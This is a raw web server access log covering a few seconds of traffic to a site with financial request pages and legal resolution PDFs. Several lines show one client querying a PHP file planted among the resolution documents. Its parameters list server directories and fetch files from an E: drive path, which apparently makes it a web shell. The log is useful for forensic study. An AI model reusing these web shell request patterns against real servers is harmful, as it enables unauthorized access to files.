186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
23.22.35.162 - - [25/Apr/2024:05:07:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0544.pdf HTTP/1.1" 200 244819
186.29.66.12 - - [25/Apr/2024:05:07:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 40499
52.70.240.171 - - [25/Apr/2024:05:08:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1550.pdf HTTP/1.1" 200 260625
47.128.124.174 - - [25/Apr/2024:05:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.124.174 - - [25/Apr/2024:05:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.174 - - [25/Apr/2024:05:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.174 - - [25/Apr/2024:05:08:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.174 - - [25/Apr/2024:05:07:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page94_thumbnail.jpg&imgsize=20 HTTP/1.1" 200 16155
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.174 - - [25/Apr/2024:05:08:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
216.245.221.92 - - [25/Apr/2024:05:08:02 -0500] "HEAD / HTTP/1.1" 200 -
186.29.66.12 - - [25/Apr/2024:05:08:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 40446
23.22.35.162 - - [25/Apr/2024:05:08:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0542.pdf HTTP/1.1" 200 289025
186.29.66.12 - - [25/Apr/2024:05:08:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 305625
3.224.220.101 - - [25/Apr/2024:05:08:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1549.pdf HTTP/1.1" 200 261527
